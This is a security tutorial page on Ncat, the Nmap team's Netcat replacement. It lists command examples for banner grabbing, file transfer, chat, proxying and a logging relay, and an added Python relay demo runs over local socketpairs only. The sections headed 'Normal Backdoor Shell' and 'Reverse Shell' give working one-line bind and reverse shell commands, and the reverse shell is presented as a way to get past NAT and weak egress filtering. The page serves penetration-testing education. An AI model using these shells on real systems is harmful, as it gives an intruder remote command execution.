Ncat Tutorial: A modern Netcat from the Nmap team (Hacking Illustrated Series InfoSec Tutorial Videos)
For those not in the know, Netcat is a utility whose goal is to be like the
Unix cat command, but for network connections. It has been referred to as
a "Swiss-army knife for TCP/IP" for good reason; with it you can:
1. Create simple telnet and other types of servers.
2. Banner grab.
3. Transfer files.
4. Do sockets (sort of) in shell and batch scripts, thus making a
script that does about anything you want on the network.
and much more. You really don't get the power of Netcat from the simple concept
until you start playing with it.
I've known about Netcat for years, but I can't say I've played with it much
until I took Ed Skoudis' and John Strand's SANS 560 course. During the class I
told Ed I was going to adapt his Netcat primer into a video. Well, I dragged my
feet on that till Fyodor and the Nmap team put out Ncat, an actively developed
multi-platform implementation of the Netcat concept. While there have been many
implementations of Netcat since Hobbit's original, I feel Ncat has the brightest
future. In this video I'll explain most of the Ncat flags, though I will not use
all of them in the examples. The Ncat demos I give in this video should get you
started with your own ideas of how you can use Ncat.
Some of the commands used in this tutorial:
Simple Banner grab:
C:\client>ncat google.com 80
GET / HTTP/1.1
Use as telnet client:
C:\client>ncat -t 192.168.1.1 23
Simple Web Server:
C:\server>ncat -l 127.0.0.1 80 < stuff.txt
C:\client>ncat localhost 80
C:\server>ncat -l --keep-open 74 < stuff.txt
C:\client>ncat localhost 74
Copy file with UDP:
C:\server>ncat -l 74 --udp
C:\client>ncat --udp localhost 74 < stuff.txt
Use Source port and source address:
C:\client>ncat www.irongeek.com 80 -p 80 -s 127.0.0.1
C:\client>ncat www.irongeek.com 80 -p 80 -s 192.168.1.1
Brokered connection to many hosts:
C:\server>ncat -l 74
C:\client1>ncat localhost 74
C:\client2>ncat localhost 74
C:\server>ncat -l 74 --broker
C:\client1>ncat localhost 74
C:\client2>ncat localhost 74
Simple Chat:
C:\server>ncat -l 74 --chat
C:\client1>ncat localhost 74
C:\client2>ncat localhost 74
SSL Header Grab:
C:\client>ncat gmail.google.com 443
GET / HTTP/1.1
C:\client>ncat gmail.google.com 443 --ssl
GET / HTTP/1.1
File transfer with SSL:
C:\server>ncat.exe -l --ssl 74 --send-only < ncat.exe
C:\client>ncat localhost 74 --ssl > out2.exe
(ends on its own once the file is sent)
C:\client>ncat --ssl -vvv -l > newfile
C:\server>ncat -v --send-only --ssl localhost < ncat.exe
(Good for getting around NAT)
Simple proxy Server:
C:\ncat>ncat -l 8080 --proxy-type http --proxy-auth adc:test --ssl
Normal Backdoor Shell:
Linux:
ncat -l 23 -e /bin/sh
C:\server>ncat 192.168.159.128 23
Windows:
C:\server>ncat -l 23 -e cmd
ncat 192.168.159.129 23
Reverse Shell (AKA: shovel a shell, and get past NAT and firewalls with weak egress filtering):
ncat -l 74
C:\server>ncat 192.168.159.128 74 -e cmd
Another Crappy Web Server:
C:\server>ncat -l 80 -c "type http.txt"
Access control:
Windows:
C:\server>ncat -l 23 -e cmd --allow 192.168.159.128
ncat 192.168.159.129 23
Ncat relay:
C:\ncat>ncat -l localhost 80 --sh-exec "ncat google.com 80 -o text.txt -x hex.txt"
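The relay above hands each client to a second ncat that forwards to the real server while recording the session in raw form (-o) and as a hex dump (-x). To show what that second ncat is doing, here is an added example, not Ncat's own code: relay() pumps bytes between a client socket and an upstream socket and writes every chunk to both logs with the direction marked, and run_demo() feeds it a constructed request and reply over socket.socketpair(), so it runs without a listener or a network. The request, reply and hostname are constructed for the demonstration.

```python
"""Added example, not Ncat's own code: a logging relay like the one the
tutorial builds with --sh-exec "ncat google.com 80 -o text.txt -x hex.txt".
The traffic in run_demo() is constructed and flows over socketpairs.
"""
import io
import select
import socket


def hexdump(direction, data):
    """Hex dump with offset, 16 bytes per line and printable ASCII on the
    right; other bytes show as '.'. Each line is tagged with the direction."""
    lines = []
    for off in range(0, len(data), 16):
        chunk = data[off:off + 16]
        hexpart = " ".join(f"{b:02x}" for b in chunk)
        text = "".join(chr(b) if 32 <= b < 127 else "." for b in chunk)
        lines.append(f"[{direction}] {off:08x}  {hexpart:<47}  {text}")
    return "\n".join(lines)


def relay(client, upstream, raw_log, hex_log, idle_timeout=1.0):
    """Forward both directions until one side hangs up or both sit idle for
    idle_timeout seconds. Returns (bytes client->upstream, bytes upstream->client)."""
    label = {client: "client->upstream", upstream: "upstream->client"}
    peer = {client: upstream, upstream: client}
    moved = {client: 0, upstream: 0}
    live = [client, upstream]
    while len(live) == 2:
        readable, _, _ = select.select(live, [], [], idle_timeout)
        if not readable:
            break  # nothing in either direction for a while; stop
        for s in readable:
            data = s.recv(4096)
            if not data:
                live.remove(s)  # this side closed; stop relaying
                break
            moved[s] += len(data)
            raw_log.write(data)                            # what -o keeps
            hex_log.write(hexdump(label[s], data) + "\n")  # what -x keeps
            peer[s].sendall(data)
    return moved[client], moved[upstream]


def run_demo():
    """Constructed traffic: one client request and one upstream reply pass
    through the relay. Returns what each side received plus both logs."""
    client_side, relay_in = socket.socketpair()
    relay_out, upstream_side = socket.socketpair()
    request = b"GET / HTTP/1.1\r\nHost: example.test\r\n\r\n"   # constructed
    response = b"HTTP/1.1 200 OK\r\nContent-Length: 0\r\n\r\n"  # constructed
    raw_log, hex_log = io.BytesIO(), io.StringIO()
    client_side.sendall(request)
    upstream_side.sendall(response)
    client_side.shutdown(socket.SHUT_WR)  # client is done talking
    moved = relay(relay_in, relay_out, raw_log, hex_log)
    upstream_side.settimeout(1.0)
    client_side.settimeout(1.0)
    seen_by_upstream = upstream_side.recv(4096)
    seen_by_client = client_side.recv(4096)
    for s in (client_side, relay_in, relay_out, upstream_side):
        s.close()
    return {
        "moved": moved,
        "upstream_got": seen_by_upstream,
        "client_got": seen_by_client,
        "raw": raw_log.getvalue(),
        "hex": hex_log.getvalue(),
    }


if __name__ == "__main__":
    print(run_demo()["hex"])
```

The raw log is only useful for text protocols; the hex dump is what you read when the session is binary, and tagging each line with its direction is the detail that makes the dump usable when both sides talk at once.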